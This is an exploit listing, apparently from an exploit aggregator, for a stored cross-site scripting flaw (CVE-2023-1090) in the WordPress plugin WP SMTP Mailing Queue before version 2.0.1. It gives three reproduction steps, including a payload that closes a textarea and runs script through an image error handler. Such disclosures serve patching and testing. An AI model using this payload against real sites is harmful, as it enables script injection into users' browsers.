Exploit for WP SMTP Mailing Queue < 2.0.1 - Admin+ Stored XSS CVE-2023-1090

Name: Exploit for WP SMTP Mailing Queue < 2.0.1 - Admin+ Stored XSS CVE-2023-1090
Rating: 5 (43 reviews)

2023-04-05 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:D470DD6C-DCAC-4A3E-B42A-2489A31ACA45
1. Navigate to "Settings > SMTP Mailing Queue > Tools"
2. For the "Message" value add the code: `</textarea><img src=1 onerror=alert(/xss/)><textarea>`
3. Refresh page and see XSS.